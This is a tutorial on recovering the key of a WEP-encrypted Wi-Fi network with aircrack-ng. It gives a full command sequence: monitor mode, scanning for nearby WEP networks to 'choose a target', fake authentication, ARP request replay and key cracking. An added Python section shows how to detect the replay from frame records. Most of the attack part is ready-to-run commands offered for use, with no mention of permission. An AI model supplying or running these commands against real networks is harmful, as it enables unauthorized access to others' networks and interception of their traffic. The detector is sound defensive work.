Simple guide to acquiring the key from a WEP encrypted network

    
    This tutorial is a simple guide to a common, effective attack on WEP based networks that yields the WEP key. We will be using tools from the aircrack-ng suite on a Linux system with aircrack-ng already installed and working (such as BackTrack, Wifiway, or Wifislax). The idea is to capture a large number of IVs (initialization vectors), which carry information about the WEP key. With enough IVs, aircrack-ng can recover the key from them. To generate IVs we will use the "ARP request replay attack". IVs are generated when the access point receives an ARP (address resolution protocol) packet. An ARP packet is generated when a host wants to resolve a network address into a physical address. While associated with the access point via a fake authentication, the access point will interact with us rather than simply ignore us. Therefore we can eavesdrop on the network traffic until an ARP packet is caught, which will produce an IV. We can then re-inject this packet over and over, generating new IVs at a rapid rate. With a sufficient number of IVs, aircrack-ng can crack the WEP key. The process is simple:
    
    - Place your wireless network card into 'monitor mode'.
    - Enumerate WEP networks in your area, then choose a target.
    - Focus in on the target and create a file to dump all the traffic and captured data into.
    - Conduct a fake authentication with the access point to allow for communication.
    - Start the ARP request replay attack and wait for an ARP packet to be captured and re-injected.
    - Start aircrack-ng to use the captured data to crack the key.
    
    A few pieces of information will be required about your own computer and about the network you are attacking. In this example we will use the following:
    
    OUR INFORMATION:
    - network interface: wlan0, mon0
    - BSSID (MAC address): 00:11:22:33:44:55
    
    TARGET INFORMATION:
    - channel: 9
    - BSSID (MAC address): d0:df:9a:1e:2e:ec
    - ESSID (access point name): NetLinx
    
    We will start with the steps, each with an explanation. Then we will finish with just the commands, one after the other. Open up a shell and proceed with these commands:
    
    1 - Place your wireless network card into 'monitor mode'.
    
    >airmon-ng start wlan0
    
    (This will create a new interface, in our case called 'mon0'. 'mon0' is the interface that is in monitor mode.)
    
    
    2 - Enumerate WEP networks in your area, then choose a target.
    
    >airodump-ng --encrypt wep mon0
    
    (This will scan only for networks that are using WEP. This is where we obtain the channel, ESSID, and BSSID of our target. The next command will focus airodump-ng onto the target that we are using in this tutorial.)
    
    
    3 - Focus in on the target, and create a file to dump all the traffic and captured data into.
    
    >airodump-ng -c 9 --bssid d0:df:9a:1e:2e:ec -w dumpfile mon0
    
    ('-c 9' specifies channel 9. '--bssid' focuses onto the target MAC address. '-w dumpfile' creates a file with the prefix 'dumpfile' in which all of our captured data is stored.)
    
    
    4 - Conduct a 'fake authentication' with the access point, to allow for communication between us and the access point. (open a new shell)
    
    >aireplay-ng --fakeauth 6000 -q 10 -a d0:df:9a:1e:2e:ec -e NetLinx -h 00:11:22:33:44:55 mon0
    
    ('--fakeauth 6000' performs a 'fake authentication' and re-authenticates every 6000 seconds. This long delay allows 'keep-alive' packets to be used in between. '-q' specifies how many seconds to wait between sending 'keep-alive' packets to the access point. '-a' specifies the target MAC address. '-e' specifies the target name (ESSID). '-h' specifies our MAC address. aireplay-ng will report a successful status if you have indeed associated with the access point. If you are not yet successful, you will see aireplay-ng retry over and over. You must associate before you move forward. One main cause of an unsuccessful association is being too far away from the access point.)
    
    
    5 - Start the ARP request replay attack, and wait for an ARP packet to be captured and re-injected. (open a new shell)
    
    >aireplay-ng -3 -b d0:df:9a:1e:2e:ec -h 00:11:22:33:44:55 mon0
    
    ('-3' specifies the 'ARP request replay attack'. '-b' specifies the target MAC address. '-h' specifies our MAC address. After a while you should capture an ARP packet, and the re-injection will begin automatically. If this works, you will see the number under the 'data' column in airodump-ng increase rapidly; if so, proceed to the final step.)
    
    
    6 - Start aircrack-ng and use the captured data file to crack the WEP key. (open a new shell)
    
    >aircrack-ng dumpfile*.cap
    
    (This will run aircrack-ng on the capture file created by airodump-ng, which provides the data used to crack the key. If it fails, it will retry each time another 5000 IVs have been captured, until it cracks the key.)
    
    
    Now here are the commands one after the other:
    
    >airmon-ng start wlan0
    >airodump-ng --encrypt wep mon0
    >airodump-ng -c 9 --bssid d0:df:9a:1e:2e:ec -w dumpfile mon0
    >aireplay-ng --fakeauth 6000 -q 10 -a d0:df:9a:1e:2e:ec -e NetLinx -h 00:11:22:33:44:55 mon0 (in a new shell)
    >aireplay-ng -3 -b d0:df:9a:1e:2e:ec -h 00:11:22:33:44:55 mon0 (in a new shell)
    >aircrack-ng dumpfile*.cap (in a new shell)
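    From the defender's side, the replay in step 5 has a distinctive signature: one station transmits the same encrypted ARP frame hundreds of times per second, whereas a legitimate 802.11 retry repeats a frame only a handful of times. The following detector is an added example, not part of the original tutorial; it runs over constructed frame records (timestamp, transmitter, BSSID, frame kind, digest of the frame body) of the kind a wireless IDS would extract from a monitor-mode capture.

```python
"""Flag the ARP-request replay pattern in a stream of 802.11 frame records."""
from collections import defaultdict

# Constructed sample records: (timestamp_s, transmitter_mac, bssid, kind, body_hash).
# kind is "arp" for an ARP request carried in a data frame. body_hash stands for a
# digest of the encrypted body; a replayed frame repeats it byte for byte.
SAMPLE_FRAMES = [
    (0.00, "aa:bb:cc:00:00:01", "00:de:ad:be:ef:01", "arp", "h1"),  # normal client
    (0.50, "aa:bb:cc:00:00:02", "00:de:ad:be:ef:01", "arp", "h2"),  # normal client
] + [
    # 600 byte-identical copies of the first client's frame in ~1.2 s: a replay
    (1.00 + i * 0.002, "aa:bb:cc:00:00:09", "00:de:ad:be:ef:01", "arp", "h1")
    for i in range(600)
]


def detect_arp_replay(frames, window_s=1.0, threshold=100):
    """Return one alert per (transmitter, bssid, body_hash) whose identical ARP
    frame is seen more than `threshold` times inside any `window_s` window.

    The threshold is deliberately far above normal retry counts so that
    ordinary link-layer retransmissions never trigger it."""
    alerts = []
    seen = defaultdict(list)  # (transmitter, bssid, body_hash) -> sorted timestamps
    for ts, tx, bssid, kind, body in sorted(frames):
        if kind == "arp":
            seen[(tx, bssid, body)].append(ts)
    for (tx, bssid, body), times in seen.items():
        start = 0
        for end in range(len(times)):  # sliding window over timestamps
            while times[end] - times[start] > window_s:
                start += 1
            count = end - start + 1
            if count > threshold:
                alerts.append({"transmitter": tx, "bssid": bssid,
                               "body_hash": body, "count": count,
                               "first_seen": times[start]})
                break  # one alert per replayed frame is enough
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_replay(SAMPLE_FRAMES):
        print("ARP replay from %(transmitter)s against %(bssid)s: "
              "%(count)d identical frames" % alert)
```

    The same capture shows a second symptom on the access point side: its data-frame counter (the 'data' column above) climbs far faster than the number of associated clients can explain.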
    
    Conclusion
    All in all this could take anywhere from 5 minutes to perhaps even hours if you are barely within range. The longest it's ever taken me is about half an hour, but the shortest it's taken me was only about 3 minutes. I think the range is the most significant factor here, and if anything fails due to your range, it will probably be the fake authentication. If you just cannot seem to authenticate, this is a good indicator that you are just not quite close enough. There are many WEP attacks in play, and it is still a growing field of study for as long as WEP remains in use. This attack is a good way to grasp the concepts and get used to the feel of wireless hacking as you progress through the steps and watch the pieces come together first hand, which is the general purpose of this tutorial: an in-depth yet simple guide to help begin the spark that I felt when I was successful for the first time, which pushed my ambition to learn more, even harder and faster. So thanks for reading, and please comment if you want, or would like to talk about other wireless topics or more specific WEP topics, and good luck.